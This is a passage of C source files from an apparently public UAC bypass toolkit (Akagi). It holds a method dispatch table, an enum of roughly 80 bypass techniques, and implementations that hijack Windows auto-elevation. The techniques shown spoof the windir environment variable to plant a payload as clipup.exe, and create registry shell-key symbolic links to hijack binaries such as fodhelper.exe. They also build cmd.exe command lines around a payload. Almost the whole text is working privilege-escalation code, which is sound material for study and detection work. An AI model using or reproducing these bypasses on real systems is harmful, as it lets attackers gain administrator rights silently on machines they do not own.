STATUS_NOT_SUPPORTED;\n#else\n return ucmEditionUpgradeManagerMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#endif\n}\n\nUCM_API(MethodDebugObject)\n{\n LPWSTR lpszPayload = NULL;\n UNREFERENCED_PARAMETER(Parameter);\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmDebugObjectMethod(lpszPayload);\n}\n\nUCM_API(MethodShellChangePk)\n{\n LPWSTR lpszPayload = NULL;\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmShellRegModMethod(Parameter->Method,\n T_LAUNCHERSYSTEMSETTINGS,\n SLUI_EXE,\n lpszPayload);\n}\n\nUCM_API(MethodNICPoison)\n{\n#ifndef _WIN64\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#else\n if (Parameter->Method == UacMethodNICPoison) {\n\n return ucmNICPoisonMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n\n }\n else if (Parameter->Method == UacMethodNICPoison2) {\n\n return ucmNICPoisonMethod2(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n\n }\n else \n return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodIeAddOnInstall)\n{\n#ifdef _WIN64\n return ucmIeAddOnInstallMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodWscActionProtocol)\n{\n LPWSTR lpszPayload = NULL;\n\n UNREFERENCED_PARAMETER(Parameter);\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmWscActionProtocolMethod(lpszPayload);\n}\n\nUCM_API(MethodFwCplLua2)\n{\n LPWSTR lpszPayload = NULL;\n\n UNREFERENCED_PARAMETER(Parameter);\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmFwCplLuaMethod2(lpszPayload);\n}\n\nUCM_API(MethodProtocolHijack)\n{\n NTSTATUS Result = STATUS_ACCESS_DENIED;\n LPWSTR PayloadParameter = NULL, PayloadFinal = NULL;\n SIZE_T Size;\n\n //\n // Select target application or use given by optional parameter.\n //\n if (g_ctx->OptionalParameterLength == 0)\n PayloadParameter = g_ctx->szDefaultPayload;\n else\n PayloadParameter = g_ctx->szOptionalParameter;\n\n switch (Parameter->Method) {\n \n case UacMethodMsSettingsProtocol:\n Result = ucmMsSettingsProtocolMethod(PayloadParameter);\n break;\n \n case UacMethodMsStoreProtocol:\n\n Size = ((MAX_PATH * 2) + _strlen(PayloadParameter)) * sizeof(WCHAR);\n PayloadFinal = supHeapAlloc(Size);\n if (PayloadFinal) {\n\n _strcpy(PayloadFinal, g_ctx->szSystemDirectory);\n _strcat(PayloadFinal, CMD_EXE);\n _strcat(PayloadFinal, RUN_CMD_COMMAND);\n _strcat(PayloadFinal, PayloadParameter);\n Result = ucmMsStoreProtocolMethod(PayloadFinal);\n supHeapFree(PayloadFinal);\n }\n break;\n\n }\n\n return Result;\n}\n\nUCM_API(MethodPca)\n{\n#ifndef _WIN64\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#else\n return ucmPcaMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#endif\n}\n\nUCM_API(MethodCurVer)\n{\n UNREFERENCED_PARAMETER(Parameter);\n#ifndef _WIN64\n return STATUS_NOT_SUPPORTED;\n#else\n LPWSTR lpszPayload = NULL;\n LPWSTR lpszTargetApp = NULL;\n\n WCHAR szTargetApp[MAX_PATH * 2];\n\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n lpszTargetApp = FODHELPER_EXE;\n _strcpy(szTargetApp, g_ctx->szSystemDirectory);\n _strcat(szTargetApp, lpszTargetApp);\n\n return ucmShellRegModMethod3(T_MSSETTINGS,\n szTargetApp,\n lpszPayload);\n\n#endif\n}\n\nUCM_API(MethodMsdt)\n{\n return ucmMsdtMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodDotNetSerial)\n{\n LPWSTR lpszPayload = NULL;\n\n UNREFERENCED_PARAMETER(Parameter);\n\n if (g_ctx->OptionalParameterLength == 0)\n lpszPayload = g_ctx->szDefaultPayload;\n else\n lpszPayload = g_ctx->szOptionalParameter;\n\n return ucmDotNetSerialMethod(lpszPayload);\n}\n\nUCM_API(MethodVFServerTaskSched)\n{\n return ucmVFServerTaskSchedMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodVFServerDiagProf)\n{\n return ucmVFServerDiagProfileMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodIscsiCpl)\n{\n return ucmIscsiCplMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n}\n\nUCM_API(MethodAtlHijack)\n{\n#ifdef _WIN64\n return ucmAtlHijackMethod(MMC_EXE,\n ATL_DLL,\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodSspiDatagram)\n{\n#ifdef _WIN64\n return ucmSspiDatagramMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodRequestTrace)\n{\n#ifdef _WIN64\n return ucmRequestTraceMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodQuickAssist)\n{\n#ifdef _WIN64\n return ucmQuickAssistMethod(\n Parameter->PayloadCode,\n Parameter->PayloadSize);\n#else\n UNREFERENCED_PARAMETER(Parameter);\n return STATUS_NOT_SUPPORTED;\n#endif\n}\n"
},
{
"path": "Source/Akagi/methods/methods.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: METHODS.H\n*\n* VERSION: 3.68\n*\n* DATE: 07 Mar 2025\n*\n* Prototypes and definitions for UAC bypass methods table.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef enum _UCM_METHOD {\n UacMethodTest = 0, //+\n UacMethodSysprep1 = 1, \n UacMethodSysprep2, \n UacMethodOobe, \n UacMethodRedirectExe, \n UacMethodSimda, \n UacMethodCarberp1, \n UacMethodCarberp2, \n UacMethodTilon, \n UacMethodAVrf, \n UacMethodWinsat, \n UacMethodShimPatch, \n UacMethodSysprep3, \n UacMethodMMC1, \n UacMethodSirefef, \n UacMethodGeneric, \n UacMethodGWX, \n UacMethodSysprep4, \n UacMethodManifest, \n UacMethodInetMgr, \n UacMethodMMC2, \n UacMethodSXS, \n UacMethodSXSConsent, //+\n UacMethodDISM, //+\n UacMethodComet, \n UacMethodEnigma0x3, \n UacMethodEnigma0x3_2, \n UacMethodExpLife, \n UacMethodSandworm, \n UacMethodEnigma0x3_3, \n UacMethodWow64Logger, //+\n UacMethodEnigma0x3_4, \n UacMethodUiAccess, //+\n UacMethodMsSettings, //+\n UacMethodDiskSilentCleanup, //+\n UacMethodTokenMod, \n UacMethodJunction, //+\n UacMethodSXSDccw, //+\n UacMethodHakril, //+\n UacMethodCorProfiler, //+\n UacMethodCOMHandlers, \n UacMethodCMLuaUtil, //+\n UacMethodFwCplLua, \n UacMethodDccwCOM, //+\n UacMethodVolatileEnv, \n UacMethodSluiHijack, \n UacMethodBitlockerRC, \n UacMethodCOMHandlers2, \n UacMethodSPPLUAObject, \n UacMethodCreateNewLink, \n UacMethodDateTimeWriter, \n UacMethodAcCplAdmin, \n UacMethodDirectoryMock, //+\n UacMethodShellSdclt, //+\n UacMethodEgre55, \n UacMethodTokenModUiAccess, //+\n UacMethodShellWSReset, \n UacMethodSysprep5, \n UacMethodEditionUpgradeMgr, //+\n UacMethodDebugObject, //+\n UacMethodGlupteba, \n UacMethodShellChangePk, //+\n UacMethodMsSettings2, //+\n UacMethodNICPoison, //+\n UacMethodIeAddOnInstall, //+\n UacMethodWscActionProtocol, //+\n UacMethodFwCplLua2, //+\n UacMethodMsSettingsProtocol,//+\n UacMethodMsStoreProtocol, //+\n UacMethodPca, //+\n UacMethodCurVer, //+\n UacMethodNICPoison2, //+\n UacMethodMsdt, //+\n UacMethodDotNetSerial, //+\n UacMethodVFServerTaskSched, //+\n UacMethodVFServerDiagProf, //+\n UacMethodIscsiCpl, //+\n UacMethodAtlHijack, //+\n UacMethodSspiDatagram, //+\n UacMethodTokenModUiAccess2, //+\n UacMethodRequestTrace, //+\n UacMethodQuickAssist, //+\n UacMethodMax,\n UacMethodInvalid = 0xabcdef\n} UCM_METHOD;\n\n#define UCM_DISPATCH_ENTRY_MAX UacMethodMax\n\ntypedef struct _UCM_METHOD_AVAILABILITY {\n ULONG MinumumWindowsBuildRequired; //if the current build less this value this method is not working here\n ULONG MinimumExpectedFixedWindowsBuild; //if the current build equal or greater this value this method is not working here or fixed\n} UCM_METHOD_AVAILABILITY;\n\ntypedef struct tagUCM_PARAMS_BLOCK {\n UCM_METHOD Method;\n PVOID PayloadCode;\n ULONG PayloadSize;\n} UCM_PARAMS_BLOCK, *PUCM_PARAMS_BLOCK;\n\ntypedef NTSTATUS(CALLBACK *PUCM_API_ROUTINE)(\n _In_ PUCM_PARAMS_BLOCK Parameter\n );\n \n#define UCM_API(n) NTSTATUS CALLBACK n( \\\n _In_ PUCM_PARAMS_BLOCK Parameter) \n\ntypedef struct _UCM_API_DISPATCH_ENTRY {\n PUCM_API_ROUTINE Routine; //method to execute\n UCM_METHOD_AVAILABILITY Availability; //min and max supported Windows builds\n ULONG PayloadResourceId; //which payload dll must be used\n BOOL Win32OrWow64Required;\n BOOL DisallowWow64;\n BOOL SetParameters; //need shared parameters to be set\n} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;\n\n#include \"elvint.h\"\n#include \"routines.h\"\n#include \"comsup.h\"\n#include \"tests\\test.h\"\n\nNTSTATUS MethodsManagerCall(\n _In_ UCM_METHOD Method);\n"
},
{
"path": "Source/Akagi/methods/rinn.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2025\n*\n* TITLE: RINN.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* FBK UAC bypass methods.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmEditionUpgradeManagerMethod\n*\n* Purpose:\n*\n* Bypass UAC using EditionUpgradeManager autoelevated interface.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n* EditionUpgradeManager has method called AcquireModernLicenseWithPreviousId.\n* During it execution MS code starts Clipup.exe process from (what it suppose) windows system32 folder.\n* However since MS programmers always lazy and banned in their own documentation it uses\n* environment variable \"windir\" to expand Windows directory instead of using something like GetSystemDirectory.\n* This giving us opportunity (hello Nadela) to spoof current user environment variable for requested DllHost.exe\n* thus turning their code launch our clipup.exe from our controlled location.\n*\n*/\nNTSTATUS ucmEditionUpgradeManagerMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n BOOL bEnvSet = FALSE;\n HRESULT hr_init;\n IEditionUpgradeManager *Manager = NULL;\n\n DWORD Data[3];\n\n LPOLESTR lpGuidDir = NULL;\n LPWSTR lpPath = NULL;\n LPWSTR stringPtr = NULL;\n\n SIZE_T nLen;\n\n GUID guidTemp;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n if (CoCreateGuid(&guidTemp) != S_OK)\n break;\n\n if (StringFromCLSID(&guidTemp, &lpGuidDir) != S_OK)\n break;\n\n nLen = (1 + _strlen(lpGuidDir) + (MAX_PATH * 2)) * sizeof(WCHAR);\n lpPath = (LPWSTR)supHeapAlloc(nLen);\n if (lpPath == NULL)\n break;\n\n //\n // Replace default Fubuki dll entry point with new and remove dll flag.\n //\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n FUBUKI_DEFAULT_ENTRYPOINT,\n TRUE))\n {\n break;\n }\n\n //\n // Create %temp%\\{GUID} directory.\n //\n \n _strcpy(lpPath, g_ctx->szTempDirectory);\n stringPtr = _strcat(lpPath, lpGuidDir);\n\n if (!CreateDirectory(lpPath, NULL))\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n\n //\n // Set controlled environment variable.\n //\n bEnvSet = supSetEnvVariable(FALSE,\n NULL,\n T_WINDIR,\n lpPath);\n\n if (!bEnvSet)\n break;\n\n //\n // Create %temp%\\{GUID}\\system32 directory.\n //\n _strcat(lpPath, SYSTEM32_DIR);\n if (!CreateDirectory(lpPath, NULL))\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n\n //\n // Drop payload to %temp%\\system32 as clipup.exe and run target interface.\n //\n _strcat(lpPath, CLIPUP_EXE);\n if (supWriteBufferToFile(lpPath, ProxyDll, ProxyDllSize)) {\n\n if (FAILED(ucmAllocateElevatedObject(T_CLSID_EditionUpgradeManager,\n &IID_EditionUpgradeManager,\n CLSCTX_LOCAL_SERVER,\n &Manager)))\n {\n break;\n }\n\n if (Manager == NULL) {\n break;\n }\n\n Data[0] = 'f';\n Data[1] = 'f';\n Data[2] = 0;\n\n Manager->lpVtbl->AcquireModernLicenseWithPreviousId(Manager,\n MYSTERIOUSCUTETHING, (PDWORD)&Data);\n\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n if (Manager)\n Manager->lpVtbl->Release(Manager);\n\n //\n // Cleanup section.\n //\n // 1. Remove variable.\n // 2. Remove payload file.\n // 3. Remove fake directories.\n //\n if (bEnvSet)\n supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);\n\n CoTaskMemFree(lpGuidDir);\n\n supWaitForGlobalCompletionEvent();\n\n if (lpPath) {\n if (stringPtr) {\n DeleteFile(lpPath);\n\n *stringPtr = 0;\n _strcat(lpPath, SYSTEM32_DIR);\n RemoveDirectory(lpPath);\n\n *stringPtr = 0;\n RemoveDirectory(lpPath);\n }\n\n supHeapFree(lpPath);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/methods/routines.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: ROUTINES.H\n*\n* VERSION: 3.68\n*\n* DATE: 07 Mar 2025\n*\n* Prototypes of methods for UAC bypass methods table.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nNTSTATUS ucmGenericAutoelevationEx(\n _In_opt_ LPCWSTR lpTargetApp,\n _In_ LPCWSTR lpTargetDll,\n _In_opt_ LPCWSTR lpParameters,\n _In_opt_ LPCWSTR lpSubDirectory,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmGenericAutoelevation(\n _In_opt_ LPCWSTR lpTargetApp,\n _In_ LPCWSTR lpTargetDll,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmShellRegModMethod(\n _In_ UCM_METHOD Method,\n LPCWSTR lpTargetKey,\n LPCWSTR lpszTargetApp,\n LPCWSTR lpszPayload);\n\nNTSTATUS ucmShellRegModMethod2(\n _In_ UCM_METHOD Method,\n LPCWSTR lpTargetKey,\n LPCWSTR lpszTargetApp,\n LPCWSTR lpszPayload);\n\nNTSTATUS ucmShellRegModMethod3(\n LPCWSTR lpTargetKey,\n LPCWSTR lpszTargetApp,\n LPCWSTR lpszPayload);\n\nNTSTATUS ucmCMLuaUtilShellExecMethod(\n _In_ LPWSTR lpszExecutable);\n\nNTSTATUS ucmNICPoisonMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmNICPoisonMethod2(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmIeAddOnInstallMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmWscActionProtocolMethod(\n _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmFwCplLuaMethod2(\n _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmMsSettingsProtocolMethod(\n _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmMsStoreProtocolMethod(\n _In_ LPCWSTR lpszPayload);\n\nNTSTATUS ucmPcaMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDirectoryMockMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmHakrilMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmSXSMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize,\n _In_opt_ LPWSTR lpTargetDirectory,\n _In_ LPWSTR lpTargetApplication,\n _In_opt_ LPWSTR lpLaunchApplication,\n _In_ BOOL bConsentItself);\n\nNTSTATUS ucmDismMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmWow64LoggerMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmUiAccessMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmSXSDccwMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmCorProfilerMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDccwCOMMethod(\n _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmJunctionMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmMsdtMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmIscsiCplMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDotNetSerialMethod(\n _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmEditionUpgradeManagerMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDiskCleanupEnvironmentVariable(\n _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmTokenModUIAccessMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmTokenModUIAccessMethod2(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmDebugObjectMethod(\n _In_ LPWSTR lpszPayload);\n\nNTSTATUS ucmVFServerTaskSchedMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmVFServerDiagProfileMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nBOOL ucmCreateCabinetForSingleFile(\n _In_ LPWSTR lpSourceDll,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize,\n _In_opt_ LPWSTR lpInternalName);\n\nBOOL ucmWusaExtractViaJunction(\n _In_ LPWSTR lpTargetDirectory);\n\nNTSTATUS ucmAtlHijackMethod(\n _In_opt_ LPCWSTR lpTargetApp,\n _In_ LPCWSTR lpTargetDll,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmSspiDatagramMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmRequestTraceMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmQuickAssistMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize);\n\n//\n// Post execution cleanup routines.\n//\nBOOL ucmMethodCleanupSingleItemSystem32(\n _In_ LPCWSTR lpItemName,\n _In_opt_ LPCWSTR lpSubDirectory);\n\nBOOL ucmJunctionMethodCleanup(\n VOID);\n\nBOOL ucmSXSDccwMethodCleanup(\n VOID);\n\nBOOL ucmSXSMethodCleanup(\n VOID);\n\nVOID ucmDismMethodCleanup(\n VOID);\n\nBOOL ucmHakrilMethodCleanup(\n VOID);\n\nVOID ucmWusaCabinetCleanup(\n VOID);\n\nVOID ucmIscsiCplMethodCleanup(\n VOID);\n"
},
{
"path": "Source/Akagi/methods/shellsup.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2023\n*\n* TITLE: SHELLSUP.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* Shell registry hijack autoelevation methods.\n*\n* Used by various malware.\n*\n* For description please visit original URL\n* https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n* https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n* https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\n* https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n* https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n* http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\n* https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html\n* https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html\n* https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmxSetSlaveParams\n*\n* Purpose:\n*\n* Set slave key parameters.\n*\n*/\nNTSTATUS ucmxSetSlaveParams(\n _In_ HANDLE KeyHandle,\n _In_ LPCWSTR Payload\n)\n{\n NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n SIZE_T sz;\n DWORD cbData, dummy;\n\n dummy = 0;\n cbData = 0;\n\n ntStatus = supRegWriteValue(KeyHandle,\n T_DELEGATEEXECUTE,\n REG_SZ,\n &dummy,\n cbData);\n\n if (NT_SUCCESS(ntStatus)) {\n\n //\n // Set \"Default\" value as our payload.\n //\n sz = (1 + _strlen(Payload)) * sizeof(WCHAR);\n\n ntStatus = supRegWriteValue(KeyHandle,\n NULL,\n REG_SZ,\n (PVOID)Payload,\n (ULONG)sz);\n\n }\n\n return ntStatus;\n}\n\n/*\n* ucmxCreateSlaveKey\n*\n* Purpose:\n*\n* Create temporary key with all required values.\n*\n*/\nNTSTATUS ucmxCreateSlaveKey(\n _In_ HANDLE RootKey,\n _In_ LPCWSTR Payload,\n _Inout_ LPWSTR SlaveKey //cch max MAX_PATH\n)\n{\n NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n GUID guidTemp;\n LPWSTR lpGuidKey = NULL;\n\n HKEY hKey;\n SIZE_T sz;\n\n do {\n\n if (CoCreateGuid(&guidTemp) != S_OK)\n break;\n\n if (StringFromCLSID(&guidTemp, &lpGuidKey) != S_OK)\n break;\n\n sz = (1 + _strlen(lpGuidKey)) * sizeof(WCHAR);\n\n _strncpy(SlaveKey, MAX_PATH, lpGuidKey, MAX_PATH);\n\n //\n // Slave key with data.\n //\n if (ERROR_SUCCESS == RegCreateKey(RootKey,\n lpGuidKey,\n &hKey))\n {\n ntStatus = ucmxSetSlaveParams(hKey, Payload);\n RegCloseKey(hKey);\n }\n\n } while (FALSE);\n\n CoTaskMemFree(lpGuidKey);\n\n return ntStatus;\n}\n\n/*\n* ucmShellRegModMethod\n*\n* Purpose:\n*\n* Bypass UAC using various registry shell key modifications.\n*\n*/\nNTSTATUS ucmShellRegModMethod(\n _In_ UCM_METHOD Method,\n LPCWSTR lpTargetKey,\n LPCWSTR lpszTargetApp,\n LPCWSTR lpszPayload\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n BOOLEAN bSlaveCreated = FALSE;\n NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n\n HANDLE masterRootKey = NULL, classesKey = NULL, targetKey = NULL;\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING usCurrentUser, usMasterKey, usSlaveKey;\n\n WCHAR szSlaveKey[MAX_PATH * 2];\n WCHAR szMasterKey[MAX_PATH * 2];\n WCHAR szClasses[MAX_PATH];\n WCHAR szBuffer[MAX_PATH * 2];\n\n SHELLEXECUTEINFO shinfo;\n\n LPWSTR lpSlaveNtKey = NULL;\n\n DWORD dummy;\n SIZE_T sz;\n UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L\"SymbolicLinkValue\");\n HRESULT hr_init;\n\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n RtlSecureZeroMemory(&szSlaveKey, sizeof(szSlaveKey));\n\n#ifndef _WIN64\n if (g_ctx->IsWow64) {\n ntStatus = supEnableDisableWow64Redirection(TRUE);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n }\n#endif\n\n do {\n\n //\n // Remember current user reg name.\n //\n ntStatus = RtlFormatCurrentUserKeyPath(&usCurrentUser);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n //\n // Open classes root.\n //\n ntStatus = supOpenClassesKey(&usCurrentUser, &classesKey);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n //\n // Create slave key.\n //\n szSlaveKey[0] = L'\\\\';\n szSlaveKey[1] = 0;\n\n ntStatus = ucmxCreateSlaveKey(\n classesKey,\n lpszPayload,\n &szSlaveKey[1]);\n\n if (!NT_SUCCESS(ntStatus))\n break;\n\n bSlaveCreated = TRUE;\n\n //\n // Allocate slave NT regpath.\n //\n sz = (MAX_PATH + _strlen(szSlaveKey) * sizeof(WCHAR)) +\n usCurrentUser.MaximumLength;\n\n lpSlaveNtKey = (PWSTR)supHeapAlloc(sz);\n if (lpSlaveNtKey == NULL)\n break;\n\n RtlInitEmptyUnicodeString(&usSlaveKey, lpSlaveNtKey, sz);\n\n ntStatus = RtlAppendUnicodeStringToString(&usSlaveKey, &usCurrentUser);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n szClasses[0] = L'\\\\';\n szClasses[1] = 0;\n _strcpy(&szClasses[1], T_SOFTWARE_CLASSES);\n ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szClasses);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szSlaveKey);\n if (!NT_SUCCESS(ntStatus))\n break;\n\n //\n // Create empty master key.\n //\n _strncpy(szMasterKey, MAX_PATH, lpTargetKey, MAX_PATH);\n _strcat(szMasterKey, T_SHELL_OPEN);\n\n if (ERROR_SUCCESS != RegCreateKeyEx(classesKey,\n szMasterKey,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&masterRootKey,\n NULL))\n {\n break;\n }\n\n //\n // Open/create master key.\n //\n RtlInitUnicodeString(&usMasterKey, T_SHELL_COMMAND);\n InitializeObjectAttributes(&obja, &usMasterKey, OBJ_CASE_INSENSITIVE, masterRootKey, NULL);\n\n ntStatus = NtCreateKey(&targetKey,\n KEY_ALL_ACCESS,\n &obja, 0, NULL,\n REG_OPTION_CREATE_LINK | REG_OPTION_VOLATILE,\n &dummy);\n\n //\n // If link already created, update it.\n //\n if (ntStatus == STATUS_OBJECT_NAME_COLLISION) {\n\n obja.Attributes |= OBJ_OPENLINK;\n\n ntStatus = NtOpenKey(&targetKey,\n KEY_ALL_ACCESS,\n &obja);\n\n }\n\n if (!NT_SUCCESS(ntStatus))\n break;\n\n sz = _strlen(usSlaveKey.Buffer) * 